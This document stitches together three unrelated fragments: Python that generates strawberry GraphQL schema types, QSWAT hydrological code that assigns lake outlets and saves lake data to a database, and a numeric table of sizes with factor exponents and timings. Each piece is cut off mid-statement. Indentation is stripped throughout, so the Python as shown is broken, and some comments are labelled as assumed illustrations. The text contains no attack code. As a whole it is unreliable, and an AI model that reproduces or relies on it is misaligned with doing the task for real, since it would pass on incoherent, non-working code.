"__annotations__": {f: a.type_annotation for f, a in strawberry_fields.items()},
}
def strip_typename(type_: Union[str, Type]) -> Union[str, Type]:
"""
Return cleaned up typename of a class for a type annotation.
:param type_: type annotation to clean
:return: name of the resulting type (to use as ForwardRef)
"""
while hasattr(type_, "__args__"):
type_ = getattr(type_, "__args__")[0]
if isinstance(type_, str):
return type_
if isinstance(type_, ForwardRef):
return type_.__forward_arg__
if type_ in SCALARS:
return type_
return type_
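# Illustrative (assumed) behaviour of strip_typename: generic wrappers are unwrapped via __args__
# and ForwardRef arguments are reduced to their string name, e.g.
#     strip_typename(Optional[List["Author"]])  -> "Author"
#     strip_typename(int)                       -> int   (scalars pass through unchanged)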
def strip_defer_typename(type_: Union[str, Type]) -> Union[str, Type]:
"""
Return cleaned up and defered typename of a class for a type annotation.
:param type_: type annotation to clean
:return: name of the resulting type (to use as ForwardRef)
"""
type_ = strip_typename(type_)
if type_ in SCALARS:
return type_
return type_
def _apply_type_rename(name: str, target_type: GeneratedType):
if not any((t != GeneratedType.ENTITY and name.endswith(t.value) for t in GeneratedType)):
return target_type.get_typename(name)
return name
def defer_annotation(
annotation, target_type: GeneratedType = GeneratedType.ENTITY
) -> Union[Type, ModuleBoundStrawberryAnnotation]:
"""
Defer the resolution of an annotation (using ForwardRef-s).
:param annotation: annotation to defer
:param target_type: type to create the annotation for
:return:
"""
if annotation is NoneType:
return annotation
if isinstance(annotation, ForwardRef):
return defer_annotation(annotation.__forward_arg__, target_type)
if isinstance(annotation, str):
return ModuleBoundStrawberryAnnotation(_apply_type_rename(annotation, target_type))
if isclass(annotation):
if issubclass(annotation, ScalarFilter) or annotation in SCALARS:
return annotation
if dataclasses.is_dataclass(annotation) or (
issubclass(annotation, enum.Enum) and target_type in {GeneratedType.FILTER, GeneratedType.ORDERING}
):
return ModuleBoundStrawberryAnnotation(_apply_type_rename(annotation.__name__, target_type))
if isinstance(annotation, ModuleBoundStrawberryAnnotation):
return defer_annotation(annotation.annotation, target_type)
if hasattr(annotation, "__args__"):
deferred_args = [defer_annotation(arg, target_type) for arg in getattr(annotation, "__args__")]
# TODO: UGLY
new_annotation = ModuleBoundStrawberryAnnotation(
annotation.__reduce__()[1][0][ # type: ignore
(*(a.annotation if isinstance(a, StrawberryAnnotation) else a for a in deferred_args),)
]
)
return new_annotation
return annotation
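# Illustrative (assumed) usage: deferring replaces concrete entity references with ForwardRef-style
# names for the requested GeneratedType, e.g.
#     defer_annotation("Author", GeneratedType.FILTER)
# yields a ModuleBoundStrawberryAnnotation("AuthorFilter"), which is only resolved against ROOT_NS
# when the strawberry schema is built.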
def create_enum_type(attr: Type[enum.Enum]):
"""
Create strawberry enum from a python enum.
:param attr: enum class
:return: strawberry enum, enum filtering and enum ordering
"""
enum_type = strawberry.enum(attr) # type: ignore
enum_filter_type = strawberry.input(
type(
GeneratedType.FILTER.get_typename(attr.__name__),
(),
_create_fields(
{
"exact": enum_type,
}
),
)
)
values = [e.name for e in attr]
enum_ordering_type = strawberry.input(
type(
GeneratedType.ORDERING.get_typename(attr.__name__),
(),
_create_fields({k: OrderingDirection for k in values}),
)
)
setattr(sys.modules[ROOT_NS], enum_type.__name__, enum_type)
enum_type.__module__ = ROOT_NS
setattr(sys.modules[ROOT_NS], enum_filter_type.__name__, enum_filter_type)
enum_filter_type.__module__ = ROOT_NS
setattr(sys.modules[ROOT_NS], enum_ordering_type.__name__, enum_ordering_type)
enum_ordering_type.__module__ = ROOT_NS
return enum_type, enum_filter_type, enum_ordering_type
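# Note: the three generated enum types are registered as attributes of the ROOT_NS module above,
# presumably so that deferred (ForwardRef-based) annotations produced by defer_annotation can later
# be resolved by name against that namespace.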
def create_entity_type(model: Type[IEntityModel]) -> Tuple[Type[EntityType], Type[EntityType]]:
"""
Create an entity type.
:param model: class to create entity type for
:return: entity type
"""
attrs = model.get_attribute_types()
for name in attrs.keys():
attr = strip_typename(attrs[name])
if isclass(attr) and isinstance(attr, type(enum.Enum)):
enum_type, _, _ = create_enum_type(cast(Type[enum.Enum], attr))
attrs[name] = enum_type
children = model.get_children_class_names()
parent_name = model.get_parent_class_name()
entity = None
base_name = GeneratedType.ENTITY.get_typename(model.__name__)
if children:
python_entity = type(
GeneratedType.ENTITY.get_typename(model.__name__),
(EntityType,),
_create_fields(attrs),
)
entity = strawberry.interface(python_entity)
setattr(sys.modules[ROOT_NS], entity.__name__, entity)
entity.__module__ = ROOT_NS
base_name = GeneratedType.POLYMORPHIC_BASE.get_typename(parent_name if parent_name else entity.__name__)
parent_cls = (
EntityType
if parent_name is None
else ModuleBoundStrawberryAnnotation(GeneratedType.ENTITY.get_typename(parent_name)).resolve()
)
if isinstance(parent_cls, StrawberryType):
raise TypeError(f"Invalid parent type {parent_cls}")
python_base_entity = type(base_name, (parent_cls,), _create_fields(attrs))
base_entity = cast(Type[EntityType], strawberry.type(python_base_entity))
setattr(sys.modules[ROOT_NS], base_entity.__name__, base_entity)
base_entity.__module__ = ROOT_NS
def is_type_of(other, *_):
return other.__class__.__name__ == model.__name__
getattr(base_entity, "_type_definition").is_type_of = is_type_of
if entity is None:
entity = base_entity
return base_entity, cast(Type[EntityType], entity)
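# Illustrative (assumed) outcome: for a model "Animal" that has child classes, create_entity_type
# returns a concrete polymorphic base type named "Animal_" together with a strawberry interface
# named "Animal"; for a model without children, the same concrete type is returned twice.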
def create_input_types(model: Type[IEntityModel]) -> Type:
"""
Create all input types of an entity.
:param model: class to use
:return: all input types
"""
fields = _create_fields(
{
"primary_key_input": create_primary_key_input(model),
"primary_key_field": create_primary_key_field(model),
"query_one_input": create_query_one_input(model),
"query_many_input": create_query_many_input(model),
"create_one_input": create_create_one_input(model),
"update_one_input": create_update_one_input(model),
}
)
del fields["__annotations__"]
input_types = dataclasses.make_dataclass(
GeneratedType.INPUTS.get_typename(model.__name__),
[(f.name, f.type) for f in fields.values()],
bases=(StrawberryModelInputTypes,),
)
setattr(sys.modules[ROOT_NS], input_types.__name__, input_types)
input_types.__module__ = ROOT_NS
return input_types
def create_ordering_input(model: Type[IEntityModel]) -> Type[ObjectOrdering]:
"""
Create input type for ordering entities.
:param model: class to order
:return: ordering input type
"""
python_type = type(
GeneratedType.ORDERING.get_typename(model.__name__),
(ObjectOrdering,),
_create_fields(
{
k: get_ordering_type(Optional[model.get_attribute_type(k)]) # type: ignore
for k in model.get_attributes(GraphQLOperation.QUERY_MANY)
}
),
)
ordering = strawberry.input(python_type)
setattr(sys.modules[ROOT_NS], ordering.__name__, ordering)
ordering.__module__ = ROOT_NS
return ordering
def create_filter_input(model: Type[IEntityModel]) -> Type[ObjectFilter]:
"""
Create input type for filtering entities.
:param model: class to filter
:return: filter input type
"""
python_type = type(
GeneratedType.FILTER.get_typename(model.__name__),
(ObjectFilter,),
_create_fields(
{
"AND_": Optional[List[Optional[GeneratedType.FILTER.get_typename(model.__name__)]]], # type: ignore
"OR_": Optional[List[Optional[GeneratedType.FILTER.get_typename(model.__name__)]]], # type: ignore
**{
k: get_filter_type(Optional[model.get_attribute_type(k)]) # type: ignore
for k in model.get_attributes(GraphQLOperation.QUERY_MANY)
},
}
),
)
filter_ = strawberry.input(python_type)
setattr(sys.modules[ROOT_NS], filter_.__name__, filter_)
filter_.__module__ = ROOT_NS
return filter_
def create_primary_key_input(model: Type[IEntityModel]) -> type:
"""
Create input type for a primary key of an entity.
:param model: class of which primary key should be used
:return: primary key input type
"""
input_type = strawberry.input(
type(
GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__),
(PrimaryKeyInput,),
_create_fields({k: model.get_attribute_type(k) for k in model.get_primary_key()}),
)
)
setattr(sys.modules[ROOT_NS], input_type.__name__, input_type)
input_type.__module__ = ROOT_NS
return input_type
def create_primary_key_field(model: Type[IEntityModel]) -> Type:
"""
Create input field for a primary key of an entity.
this effectively wraps the primary_key_input
:param model: class of which primary key should be used
:return: primary key field
"""
pk_field = strawberry.input(
type(
GeneratedType.PRIMARY_KEY_FIELD.get_typename(model.__name__),
(EntityType,),
_create_fields(
{
"primary_key_": GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__),
},
GeneratedType.PRIMARY_KEY_FIELD,
),
)
)
setattr(sys.modules[ROOT_NS], pk_field.__name__, pk_field)
pk_field.__module__ = ROOT_NS
return pk_field
def create_query_one_input(model: Type[IEntityModel]) -> type:
"""
Create input type for retrieving an entity.
:param model: class to be queried
:return: query-one type
"""
query_one = strawberry.input(
type(
GeneratedType.QUERY_ONE.get_typename(model.__name__),
(QueryOne,),
_create_fields({"primary_key_": GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__)}),
)
)
setattr(sys.modules[ROOT_NS], query_one.__name__, query_one)
query_one.__module__ = ROOT_NS
return query_one
def create_query_many_input(model: Type[IEntityModel]) -> type:
"""
Create input type for querying list of entities.
:param model: class to be queried
:return: query-many type
"""
query_many = strawberry.input(
type(
GeneratedType.QUERY_MANY_INPUT.get_typename(model.__name__),
(QueryMany,),
_create_fields(
{
"ordering": Optional[
List[Optional[GeneratedType.ORDERING.get_typename(model.__name__)]] # type: ignore
],
"filters": Optional[
List[Optional[GeneratedType.FILTER.get_typename(model.__name__)]] # type: ignore
],
}
),
)
)
setattr(sys.modules[ROOT_NS], query_many.__name__, query_many)
query_many.__module__ = ROOT_NS
return query_many
def create_create_one_input(model: Type[IEntityModel]) -> type:
"""
Create input type for creating one entity.
:param model: class to be created
:return: input type
"""
fields = {f: model.get_attribute_type(f) for f in model.get_attributes(GraphQLOperation.CREATE_ONE)}
create_one = strawberry.input(
type(
GeneratedType.CREATE_ONE.get_typename(model.__name__),
(EntityType,),
_create_fields(fields, GeneratedType.PRIMARY_KEY_FIELD),
)
)
setattr(sys.modules[ROOT_NS], create_one.__name__, create_one)
create_one.__module__ = ROOT_NS
return create_one
def create_update_one_input(model: Type[IEntityModel]) -> type:
"""
Create input type for updating one entity.
:param model: class to be updated
:return: input type
"""
update_one = strawberry.input(
type(
GeneratedType.UPDATE_ONE.get_typename(model.__name__),
(EntityType,),
_create_fields(
{
"primary_key_": GeneratedType.PRIMARY_KEY_INPUT.get_typename(model.__name__),
**{
f: Optional[model.get_attribute_type(f)] # type: ignore
for f in model.get_attributes(GraphQLOperation.UPDATE_ONE)
},
},
GeneratedType.PRIMARY_KEY_FIELD,
),
)
)
setattr(sys.modules[ROOT_NS], update_one.__name__, update_one)
update_one.__module__ = ROOT_NS
return update_one
def create_query_many_output(model: Type[IEntityModel]) -> Type[QueryManyResult]:
"""
Create query-many output type for listing entities.
:param model: class to be listed
:return: query-many output type
"""
python_type = type(
GeneratedType.QUERY_MANY.get_typename(model.__name__),
(QueryManyResult,),
_create_fields({"results": List[GeneratedType.ENTITY.get_typename(model.__name__)]}), # type: ignore
)
query_many = strawberry.type(python_type, is_input=False)
setattr(sys.modules[ROOT_NS], query_many.__name__, query_many)
query_many.__module__ = ROOT_NS
return cast(Type[QueryManyResult], query_many)
def get_ordering_type(type_: Any):
"""
Convert type to ordering type.
:param type_: type to convert
:return: ordering type
"""
if type_ is NoneType:
raise AttributeError("Should not | |
no drainage field and more than one exit for at least one lake
needDrainage = False
if streamDrainageIndex < 0:
for data in exitData.values():
if len(data) > 1:
needDrainage = True
break
if needDrainage:
self.drainAreas = zeros((maxChLink + 1), dtype=float)
gridCellArea = self.dx * self.dy * gv.gridSize * gv.gridSize
self.setGridDrainageAreas(maxChLink, gridCellArea)
# find outlet with largest drainage and mark as THE outlet
for lakeId, data in exitData.items():
            # set maxDrainage below the -1 value used for missing drainage so that the first exit link registers;
            # if there is only one exit for each lake, needDrainage will be false
maxDrainage = -2
exLink = -1
exWsno = -1
exPoint = None
exElev = 0
for chLink, (wsno, drainage, pt, elev) in data.items():
if needDrainage:
drainage = float(self.drainAreas[chLink]) # use float to convert from numpy float
if drainage > maxDrainage:
maxDrainage = drainage
exLink = chLink
exWsno = wsno
exPoint = pt
exElev = elev
if exLink < 0:
QSWATUtils.error('There seems to be no outflow stream for lake {0}'.format(lakeId), gv.isBatch, reportErrors=reportErrors)
return -1
else:
others = list(data.keys())
others.remove(exLink)
if others != []:
QSWATUtils.information(
"""Warning: Stream link {0} chosen as main outlet for all of lake {1}.
Other possible outlet stream links are {2}.
""".format(exLink, lakeId, str([int(link) for link in others])), gv.isBatch, reportErrors=reportErrors)
self.chLinkFromLake[exLink] = lakeId
self.lakesData[lakeId].outChLink = exLink
for chLink in others:
self.chLinkFromLake[chLink] = lakeId
self.lakesData[lakeId].otherOutChLinks.add(chLink)
self.pointId += 1
self.lakesData[lakeId].outPoint = (exWsno, self.pointId, exPoint, exElev)
for lakeId, totalElev in totalElevation.items():
numInLinks = len(self.lakesData[lakeId].inChLinks)
if numInLinks > 0:
self.lakesData[lakeId].elevation = float(totalElev) / numInLinks
else:
self.lakesData[lakeId].elevation = self.lakesData[lakeId].outPoint[3]
return len(self.lakesData)
def addExistingLakes(self, lakesLayer, channelsLayer, demLayer, gv, reportErrors=True):
"""Add lakes data to existing non-grid model.
We ignore DsNodeIds for inflowing and outflowing channels since these were
probably only added previously to the snapped inlets/outlets file
        and inlets/outlets are of little use in any case with existing watersheds."""
lakeIdIndex = self.getIndex(lakesLayer, QSWATTopology._LAKEID)
lakeResIndex = self.getIndex(lakesLayer, QSWATTopology._RES)
channelLinkIndex = self.getIndex(channelsLayer, QSWATTopology._LINKNO)
channelDsLinkIndex = self.getIndex(channelsLayer, QSWATTopology._DSLINKNO)
channelBasinIndex = self.getIndex(channelsLayer, QSWATTopology._BASINNO)
channelLakeInIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEIN)
channelLakeOutIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEOUT)
channelLakeWithinIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEWITHIN)
channelLakeMainIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEMAIN)
if lakeIdIndex < 0 or channelLinkIndex < 0 or channelDsLinkIndex < 0 or channelBasinIndex < 0 or \
channelLakeInIndex < 0 or channelLakeOutIndex < 0 or channelLakeWithinIndex < 0 or channelLakeMainIndex < 0:
return False
self.lakesData = dict()
for lake in lakesLayer.getFeatures():
lakeId = lake[lakeIdIndex]
waterRole = lake[lakeResIndex]
if lakeId in self.lakesData:
QSWATUtils.error('Lake identifier {0} occurs twice in {1}. Lakes not added.'.format(lakeId, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
# to stop reuse of the same water body id
self.waterBodyId = max(self.waterBodyId, lakeId)
geom = lake.geometry()
area = geom.area()
centroid = geom.centroid().asPoint()
self.lakesData[lakeId] = LakeData(area, centroid, waterRole)
self.chLinkIntoLake = dict()
self.chLinkInsideLake = dict()
self.chLinkFromLake = dict()
self.outletsInLake = dict()
for channel in channelsLayer.getFeatures():
chLink = channel[channelLinkIndex]
dsLink = channel[channelDsLinkIndex]
lakeIn = channel[channelLakeInIndex]
lakeOut = channel[channelLakeOutIndex]
lakeWithin = channel[channelLakeWithinIndex]
lakeMain = channel[channelLakeMainIndex]
reachData = None
geom = None
if lakeIn != NULL and lakeIn > 0:
data = self.lakesData.get(lakeIn, None)
if data is None:
QSWATUtils.error('Channel with LINKNO {0} flows into lake {1} not defined in {2}. Lakes not added.'.
format(chLink, lakeIn, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
geom = channel.geometry()
reachData = self.getReachData(geom, demLayer)
point = QgsPointXY(reachData.lowerX, reachData.lowerY)
elev = reachData.lowerZ
data.elevation += elev
self.pointId += 1
data.inChLinks[chLink] = (self.pointId, point, elev)
self.chLinkIntoLake[chLink] = lakeIn
elif lakeWithin != NULL and lakeWithin > 0:
data = self.lakesData.get(lakeWithin, None)
if data is None:
QSWATUtils.error('Channel with LINKNO {0} inside lake {1} not defined in {2}. Lakes not added.'.
format(chLink, lakeWithin, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
data.lakeChLinks.add(chLink)
self.chLinkInsideLake[chLink] = lakeWithin
if dsLink < 0:
# watershed outlet
geom = channel.geometry()
reachData = self.getReachData(geom, demLayer)
subbasin = channel[channelBasinIndex]
data.outChLink = -1
point = QgsPointXY(reachData.lowerX, reachData.lowerY)
elev = reachData.lowerZ
self.pointId += 1
data.outPoint = (subbasin, self.pointId, point, elev)
self.outletsInLake[subbasin] = lakeWithin
if lakeOut != NULL and lakeOut > 0:
data = self.lakesData.get(lakeOut, None)
if data is None:
QSWATUtils.error('Channel with LINKNO {0} flows out of lake {1} not defined in {2}. Lakes not added.'.
format(chLink, lakeOut, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
if lakeMain != NULL and lakeMain == lakeOut:
# lake's main outlet
# channel leaves lake at upper end
geom = channel.geometry()
reachData = self.getReachData(geom, demLayer)
subbasin = channel[channelBasinIndex]
data.outChLink = chLink
point = QgsPointXY(reachData.upperX, reachData.upperY)
elev = reachData.upperZ
self.pointId += 1
data.outPoint = (subbasin, self.pointId, point, elev)
self.chLinkFromLake[chLink] = lakeOut
else:
# other outlet
data.otherOutChLinks.add(chLink)
# define lake elevation
for data in self.lakesData.values():
numInflows = len(data.inChLinks)
data.elevation = data.outPoint[3] if numInflows == 0 else float(data.elevation) / numInflows
return True
@staticmethod
def intersectsPoly(geom, polyGeom, polyRect):
"""Returns true if any part of geom intersects any part of polyGeom, which has associated rectangle polyRect."""
geoRect = geom.boundingBox()
if QSWATTopology.disjointBoxes(geoRect, polyRect):
return False
else:
return geom.intersects(polyGeom)
@staticmethod
def disjointBoxes(box1, box2):
"""Return True if the boxes are disjoint."""
return box1.xMinimum() > box2.xMaximum() or \
box1.xMaximum() < box2.xMinimum() or \
box1.yMinimum() > box2.yMaximum() or \
box1.yMaximum() < box2.yMinimum()
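    # Quick bounding-box rejection: two axis-aligned rectangles are disjoint exactly when one lies
    # entirely to the left, right, above or below the other, which lets intersectsPoly skip the far
    # more expensive geometry intersection test for most candidates.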
@staticmethod
def polyContains(point, polyGeom, polyRect):
"""Return true if point within polyGeom, which has associated rectangle polyRect."""
if polyRect.xMinimum() < point.x() < polyRect.xMaximum() and \
polyRect.yMinimum() < point.y() < polyRect.yMaximum():
return polyGeom.contains(point)
else:
return False
def saveLakesData(self, db):
"""Save lakes data in project database."""
with db.conn as conn:
if not conn:
return
curs = conn.cursor()
lakesTable = 'LAKESDATA'
clearSQL = 'DROP TABLE IF EXISTS ' + lakesTable
curs.execute(clearSQL)
curs.execute(db._CREATELAKESDATA)
linksTable = 'LAKELINKS'
clearSQL = 'DROP TABLE IF EXISTS ' + linksTable
curs.execute(clearSQL)
curs.execute(db._CREATELAKELINKS)
basinsTable = 'LAKEBASINS'
clearSQL = 'DROP TABLE IF EXISTS ' + basinsTable
curs.execute(clearSQL)
curs.execute(db._CREATELAKEBASINS)
for lakeId, lakeData in self.lakesData.items():
curs.execute(db._INSERTLAKESDATA, (lakeId, lakeData.outPoint[0], lakeData.waterRole, lakeData.area, lakeData.elevation, lakeData.outChLink,
lakeData.outPoint[1], lakeData.outPoint[2].x(), lakeData.outPoint[2].y(),
lakeData.outPoint[3], lakeData.centroid.x(), lakeData.centroid.y()))
# QSWATUtils.loginfo(str(lakeData.inChLinks.keys()))
# QSWATUtils.loginfo(str(lakeData.lakeChLinks))
for chLink, (pointId, pt, elev) in lakeData.inChLinks.items():
try:
curs.execute(db._INSERTLAKELINKS, (chLink, lakeId, True, False, pointId, pt.x(), pt.y(), elev))
except:
QSWATUtils.error('Failed to add in channel link {0}'.format(chLink), self.isBatch)
for chLink in lakeData.lakeChLinks:
try:
curs.execute(db._INSERTLAKELINKS, (chLink, lakeId, False, True, None, None, None, None))
except:
QSWATUtils.error('Failed to add inside channel link {0}'.format(chLink), self.isBatch)
for chLink in lakeData.otherOutChLinks:
try:
curs.execute(db._INSERTLAKELINKS, (chLink, lakeId, False, False, None, None, None, None))
except:
QSWATUtils.error('Failed to add other out channel link {0}'.format(chLink), self.isBatch)
for subbasin, lakeId in self.outletsInLake.items():
curs.execute(db._INSERTLAKEBASINS, (subbasin, lakeId))
db.hashDbTable(conn, lakesTable)
db.hashDbTable(conn, linksTable)
db.hashDbTable(conn, basinsTable)
def readLakesData(self, db):
"""Read lakes data from project database. Return true if data read OK, false if no data or error."""
with db.conn as conn:
if not conn:
return False
self.lakesData.clear()
self.chLinkIntoLake.clear()
self.chLinkInsideLake.clear()
self.chLinkFromLake.clear()
self.outletsInLake.clear()
curs = conn.cursor()
lakesTable = 'LAKESDATA'
linksTable = 'LAKELINKS'
basinsTable = 'LAKEBASINS'
lakeSql = db.sqlSelect(lakesTable, '*', '', '')
linksSql = db.sqlSelect(linksTable, '*', '', 'lakeid=?')
basinsSql = db.sqlSelect(basinsTable, '*', '', '')
try: # in case old database without these tables
# without fetchall this only reads first row. Strange
for lakeRow in curs.execute(lakeSql).fetchall():
lakeId = lakeRow['id']
self.waterBodyId = max(self.waterBodyId, lakeId)
                    self.lakesData[lakeId] = LakeData(lakeRow['area'], QgsPointXY(lakeRow['centroidx'], lakeRow['centroidy']), lakeRow['role'])
outChLink = lakeRow['outlink']
self.lakesData[lakeId].outChLink = outChLink
self.chLinkFromLake[outChLink] = lakeId
self.lakesData[lakeId].outPoint = (lakeRow['subbasin'], lakeRow['outletid'],
QgsPointXY(lakeRow['outletx'], lakeRow['outlety']), lakeRow['outletelev'])
self.lakesData[lakeId].centroid = QgsPointXY(lakeRow['centroidx'], lakeRow['centroidy'])
self.lakesData[lakeId].elevation = lakeRow['meanelev']
for linkRow in curs.execute(linksSql, (lakeId,)):
chLink = linkRow['linkno']
if linkRow['inside']:
self.lakesData[lakeId].lakeChLinks.add(chLink)
self.chLinkInsideLake[chLink] = lakeId
elif linkRow['inlet']:
self.lakesData[lakeId].inChLinks[chLink] = (linkRow['inletid'],
QgsPointXY(linkRow['inletx'], linkRow['inlety']), linkRow['inletelev'])
self.chLinkIntoLake[chLink] = lakeId
else:
self.lakesData[lakeId].otherOutChLinks.add(chLink)
self.chLinkFromLake[chLink] = lakeId
for basinRow in curs.execute(basinsSql).fetchall():
self.outletsInLake[basinRow['subbasin']] = basinRow['lakeid']
return len(self.lakesData) > 0
except:
QSWATUtils.loginfo('Reading lakes data failed: {0}'.format(traceback.format_exc()))
return False
def getDownChannel(self, channel):
"""Get downstream channel, skipping zero-length channels.
Returns -1 if the channel flows into a lake."""
if channel in self.chLinkIntoLake:
return -1
while True:
dsChannel = self.downChannels[channel]
if dsChannel in self.zeroChannels:
channel = dsChannel
else:
return dsChannel
def setChannelBasinAreas(self, gv):
"""
Define map chBasinAreas from channel basin to basin area in sq m.
Done by counting pixels in the wChannel file (as an alternative to creating a shapefile from it).
Not used | |
# gh_stars: 1-10
[262144, 18, 0, 0, 0, 0.303334],
[262440, 3, 8, 1, 0, 0.428383],
[262500, 2, 1, 5, 1, 0.530909],
[263424, 8, 1, 0, 3, 0.461892],
[264600, 3, 3, 2, 2, 0.454827],
[268800, 9, 1, 2, 1, 0.455837],
[268912, 4, 0, 0, 5, 0.482812],
[270000, 4, 3, 4, 0, 0.417645],
[272160, 5, 5, 1, 1, 0.46049],
[273375, 0, 7, 3, 0, 3.18881],
[274400, 5, 0, 2, 3, 0.442455],
[275562, 1, 9, 0, 1, 3.19153],
[275625, 0, 2, 4, 2, 3.19306],
[276480, 11, 3, 1, 0, 0.389498],
[277830, 1, 4, 1, 3, 3.14069],
[279936, 7, 7, 0, 0, 0.379176],
[280000, 6, 0, 4, 1, 0.416051],
[281250, 1, 2, 6, 0, 4.2619],
[282240, 7, 2, 1, 2, 0.462522],
[283500, 2, 4, 3, 1, 0.513674],
[285768, 3, 6, 0, 2, 0.487626],
[286720, 13, 0, 1, 1, 0.401789],
[288000, 8, 2, 3, 0, 0.440664],
[288120, 3, 1, 1, 4, 0.585384],
[290304, 9, 4, 0, 1, 0.426227],
[291600, 4, 6, 2, 0, 0.449147],
[294000, 4, 1, 3, 2, 0.529674],
[294912, 15, 2, 0, 0, 0.374028],
[295245, 0, 10, 1, 0, 3.99429],
[296352, 5, 3, 0, 3, 0.481133],
[297675, 0, 5, 2, 2, 4.00362],
[300000, 5, 1, 5, 0, 0.496454],
[300125, 0, 0, 3, 4, 4.18224],
[301056, 11, 1, 0, 2, 0.458198],
[302400, 6, 3, 2, 1, 0.459105],
[302526, 1, 2, 0, 5, 4.17258],
[303750, 1, 5, 4, 0, 4.16032],
[306180, 2, 7, 1, 1, 0.584013],
[306250, 1, 0, 5, 2, 3.53944],
[307200, 12, 1, 2, 0, 0.429037],
[307328, 7, 0, 0, 4, 0.480741],
[308700, 2, 2, 2, 3, 0.610906],
[311040, 8, 5, 1, 0, 0.491944],
[312500, 2, 0, 7, 0, 0.552553],
[313600, 8, 0, 2, 2, 0.483456],
[314928, 4, 9, 0, 0, 0.466044],
[315000, 3, 2, 4, 1, 0.558447],
[317520, 4, 4, 1, 2, 0.529411],
[320000, 9, 0, 4, 0, 0.454816],
[321489, 0, 8, 0, 2, 3.72835],
[322560, 10, 2, 1, 1, 0.516705],
[324000, 5, 4, 3, 0, 0.4634],
[324135, 0, 3, 1, 4, 3.67287],
[326592, 6, 6, 0, 1, 0.499383],
[327680, 16, 0, 1, 0, 0.436273],
[328050, 1, 8, 2, 0, 4.2825],
[328125, 0, 1, 6, 1, 3.28932],
[329280, 6, 1, 1, 3, 0.605976],
[330750, 1, 3, 3, 2, 3.29709],
[331776, 12, 4, 0, 0, 0.395057],
[333396, 2, 5, 0, 3, 0.623967],
[336000, 7, 1, 3, 1, 0.576329],
[336140, 2, 0, 1, 5, 0.682057],
[337500, 2, 3, 5, 0, 0.609307],
[338688, 8, 3, 0, 2, 0.504626],
[340200, 3, 5, 2, 1, 0.566975],
[343000, 3, 0, 3, 3, 0.598426],
[344064, 14, 1, 0, 1, 0.502549],
[345600, 9, 3, 2, 0, 0.499896],
[345744, 4, 2, 0, 4, 0.591918],
[349920, 5, 7, 1, 0, 0.528045],
[350000, 4, 0, 5, 1, 0.575812],
[351232, 10, 0, 0, 3, 0.527869],
[352800, 5, 2, 2, 2, 0.554768],
[352947, 0, 1, 0, 6, 4.62179],
[354294, 1, 11, 0, 0, 4.6245],
[354375, 0, 4, 4, 1, 4.2623],
[357210, 1, 6, 1, 2, 4.26022],
[358400, 11, 0, 2, 1, 0.494177],
[360000, 6, 2, 4, 0, 0.515534],
[360150, 1, 1, 2, 4, 4.98297],
[362880, 7, 4, 1, 1, 0.556127],
[364500, 2, 6, 3, 0, 0.655639],
[367416, 3, 8, 0, 1, 0.58193],
[367500, 2, 1, 4, 2, 0.717368],
[368640, 13, 2, 1, 0, 0.501595],
[370440, 3, 3, 1, 3, 0.713126],
[373248, 9, 6, 0, 0, 0.547194],
[375000, 3, 1, 6, 0, 0.676057],
[376320, 9, 1, 1, 2, 0.672377],
[378000, 4, 3, 3, 1, 0.634104],
[381024, 5, 5, 0, 2, 0.582933],
[382725, 0, 7, 2, 1, 5.03005],
[384000, 10, 1, 3, 0, 0.601125],
[384160, 5, 0, 1, 4, 0.661314],
[385875, 0, 2, 3, 3, 4.52545],
[387072, 11, 3, 0, 1, 0.544472],
[388800, 6, 5, 2, 0, 0.55158],
[388962, 1, 4, 0, 4, 4.36593],
[390625, 0, 0, 8, 0, 4.36731],
[392000, 6, 0, 3, 2, 0.58893],
[393216, 17, 1, 0, 0, 0.519293],
[393660, 2, 9, 1, 0, 0.701932],
[393750, 1, 2, 5, 1, 4.84566],
[395136, 7, 2, 0, 3, 0.633169],
[396900, 2, 4, 2, 2, 0.68121],
[400000, 7, 0, 5, 0, 0.559009],
[401408, 13, 0, 0, 2, 0.505121],
[403200, 8, 2, 2, 1, 0.613976],
[403368, 3, 1, 0, 5, 0.815144],
[405000, 3, 4, 4, 0, 0.62146],
[408240, 4, 6, 1, 1, 0.718326],
[409600, 14, 0, 2, 0, 0.480595],
[411600, 4, 1, 2, 3, 0.760055],
[413343, 0, 10, 0, 1, 4.72772],
[414720, 10, 4, 1, 0, 0.588263],
[416745, 0, 5, 1, 3, 4.33026],
[419904, 6, 8, 0, 0, 0.525634],
[420000, 5, 1, 4, 1, 0.697228],
[420175, 0, 0, 2, 5, 5.30346],
[421875, 0, 3, 6, 0, 5.29905],
[423360, 6, 3, 1, 2, 0.68153],
[425250, 1, 5, 3, 1, 5.29279],
[428652, 2, 7, 0, 2, 0.73583],
[428750, 1, 0, 4, 3, 5.30926],
[430080, 12, 1, 1, 1, 0.688284],
[432000, 7, 3, 3, 0, 0.610281],
[432180, 2, 2, 1, 4, 0.875485],
[435456, 8, 5, 0, 1, 0.644869],
[437400, 3, 7, 2, 0, 0.679363],
[437500, 2, 0, 6, 1, 0.843908],
[439040, 8, 0, 1, 3, 0.727313],
[441000, 3, 2, 3, 2, 0.787583],
[442368, 14, 3, 0, 0, 0.526695],
[444528, 4, 4, 0, 3, 0.720437],
[448000, 9, 0, 3, 1, 0.705895],
[450000, 4, 2, 5, 0, 0.730069],
[451584, 10, 2, 0, 2, 0.673668],
[453600, 5, 4, 2, 1, 0.652393],
[453789, 0, 3, 0, 5, 5.09819],
[455625, 0, 6, 4, 0, 5.10391],
[458752, 16, 0, 0, 1, 0.582264],
[459270, 1, 8, 1, 1, 5.10375],
[459375, 0, 1, 5, 2, 5.11197],
[460800, 11, 2, 2, 0, 0.615755],
[460992, 6, 1, 0, 4, 0.786331],
[463050, 1, 3, 2, 3, 6.00879],
[466560, 7, 6, 1, 0, 0.698346],
[468750, 1, 1, 7, 0, 7.25906],
[470400, 7, 1, 2, 2, 0.738217],
